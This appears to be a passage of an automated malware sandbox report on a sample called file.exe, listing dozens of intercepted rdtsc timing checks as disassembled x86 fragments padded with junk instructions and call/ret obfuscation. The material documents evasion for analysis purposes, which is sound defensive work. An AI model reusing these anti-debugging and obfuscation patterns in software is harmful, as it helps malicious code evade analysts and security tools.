                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671802 second address: 671829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A12E5309h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671829 second address: 671866 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F91A0D1A3D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F91A0D1A3E2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnc 00007F91A0D1A3DCh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F91A0D1A3D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67622D second address: 67624B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jnc 00007F91A12E530Fh 0x0000000f jmp 00007F91A12E52FBh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67624B second address: 67624F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6076C6 second address: 6076E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5307h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67554C second address: 675558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675558 second address: 675566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F91A12E52F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675566 second address: 6755A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F91A0D1A3D6h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 jnc 00007F91A0D1A3D6h 0x00000016 pop ebx 0x00000017 jmp 00007F91A0D1A3DDh 0x0000001c jp 00007F91A0D1A3DEh 0x00000022 pushad 0x00000023 jmp 00007F91A0D1A3DAh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6755A5 second address: 6755AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6756F6 second address: 675721 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0D1A3DEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F91A0D1A3D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F91A0D1A3D6h 0x00000018 jmp 00007F91A0D1A3E3h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675CBA second address: 675CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675CC2 second address: 675CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679473 second address: 67947C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D5A7 second address: 67D5C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E3h 0x00000007 push eax 0x00000008 jnp 00007F91A0D1A3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DC0A second address: 67DC1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E52FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DD78 second address: 67DD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DD7C second address: 67DDB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 jmp 00007F91A12E5307h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F91A12E52FAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E23A second address: 67E23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E23E second address: 67E24F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E24F second address: 67E253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E253 second address: 67E257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E257 second address: 67E25D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E25D second address: 67E263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E263 second address: 67E279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F91A0D1A3DCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6838B7 second address: 6838BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6838BB second address: 6838D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F91A0D1A3DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6838D6 second address: 6838E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F91A12E52F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6838E7 second address: 68390B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F91A0D1A3DEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647B9F second address: 647C18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F91A12E52F8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov cx, si 0x0000002b lea eax, dword ptr [ebp+12489938h] 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F91A12E52F8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jl 00007F91A12E52FCh 0x00000051 sbb edi, 02B50A02h 0x00000057 sub ecx, dword ptr [ebp+122D1BF3h] 0x0000005d mov cl, 70h 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647C18 second address: 647C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647C1C second address: 647C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647C22 second address: 647C54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A0D1A3E6h 0x00000008 jmp 00007F91A0D1A3E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F91A0D1A3E3h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647C54 second address: 647C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647C5A second address: 63079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0D1A3E8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F91A0D1A3D8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov edi, edx 0x0000002a jbe 00007F91A0D1A3D9h 0x00000030 adc ch, 00000000h 0x00000033 call dword ptr [ebp+122D1A00h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647E85 second address: 647E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647E89 second address: 647E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648133 second address: 64813D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648218 second address: 648222 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6482F7 second address: 648344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007F91A12E5305h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F91A12E5300h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jnp 00007F91A12E52FEh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 pop edi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648344 second address: 64834E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648683 second address: 648697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648697 second address: 6486BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F91A0D1A3D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F91A0D1A3E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6486BD second address: 6486C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64879D second address: 6487A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6487A1 second address: 6487A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648CC9 second address: 648CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648CCF second address: 648CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648FC9 second address: 648FE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648FE4 second address: 649052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A12E5301h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, 40C8h 0x0000002e lea eax, dword ptr [ebp+1248997Ch] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F91A12E52F8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e nop 0x0000004f pushad 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649052 second address: 649110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F91A0D1A3D8h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F91A0D1A3E6h 0x00000013 jmp 00007F91A0D1A3E9h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F91A0D1A3D8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jp 00007F91A0D1A3E1h 0x0000003a mov dword ptr [ebp+122D1896h], esi 0x00000040 lea eax, dword ptr [ebp+12489938h] 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F91A0D1A3D8h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000019h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 nop 0x00000061 jno 00007F91A0D1A3E1h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jc 00007F91A0D1A3DCh 0x00000070 jns 00007F91A0D1A3D6h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649110 second address: 631280 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A12E530Ah 0x00000008 jmp 00007F91A12E5304h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2FFCh], edi 0x00000030 call dword ptr [ebp+1246F73Bh] 0x00000036 jmp 00007F91A12E5309h 0x0000003b pushad 0x0000003c push edi 0x0000003d push edi 0x0000003e pop edi 0x0000003f pushad 0x00000040 popad 0x00000041 pop edi 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631280 second address: 631290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631290 second address: 6312A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F91A12E52F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F91A12E52F6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6312A6 second address: 6312AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6312AA second address: 6312B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682AE3 second address: 682B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A0D1A3E0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F91A0D1A3D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682B03 second address: 682B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682C2C second address: 682C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F91A0D1A3DEh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F91A0D1A3D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 682C4A second address: 682C50 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6832A0 second address: 6832A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687D9A second address: 687D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687EEF second address: 687EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68804B second address: 688057 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F91A12E52FEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6881AD second address: 6881B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6881B8 second address: 6881D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F91A12E52F6h 0x0000000a jmp 00007F91A12E5304h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688731 second address: 688755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0D1A3E1h 0x00000009 jmp 00007F91A0D1A3DFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6888A3 second address: 6888AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68796B second address: 687971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687971 second address: 687987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91A12E5301h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687987 second address: 68798D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68798D second address: 687993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD05 second address: 68CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F91A0D1A3D6h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A0D1A3E9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CD2C second address: 68CD43 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F91A12E52FFh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F75B second address: 68F76A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F91A0D1A3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F76A second address: 68F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F91A12E52F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E72 second address: 691E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691E78 second address: 691EA9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F91A12E5300h 0x00000008 pop ecx 0x00000009 jns 00007F91A12E5306h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691EA9 second address: 691EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691A43 second address: 691A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F91A12E52F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691BC9 second address: 691BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691BCD second address: 691BD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 698583 second address: 698588 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD6C second address: 60FD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD70 second address: 60FD76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD76 second address: 60FD8E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F91A12E52F6h 0x00000012 jno 00007F91A12E52F6h 0x00000018 rdtsc
